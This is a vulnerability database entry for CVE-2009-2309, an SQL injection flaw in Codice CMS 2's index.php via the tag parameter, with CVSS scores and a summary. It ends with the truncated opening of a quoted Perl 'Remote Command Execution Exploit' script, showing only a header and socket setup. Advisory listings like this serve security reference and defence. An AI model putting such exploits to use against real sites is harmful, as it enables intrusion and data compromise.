7.5
CVSSv2

CVE-2009-2309

Published: 02/07/2009 Updated: 19/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in Codice CMS 2 allows remote malicious users to execute arbitrary SQL commands via the tag parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

codice-cms codice cms 2

Exploits

#--+++===========================================================+++-- #--+++====== Codice CMS 2 Remote Command Execution Exploit ======+++-- #--+++===========================================================+++-- #!/usr/bin/perl use strict; use warnings; use IO::Socket; sub banner { print "--+++================================================ ...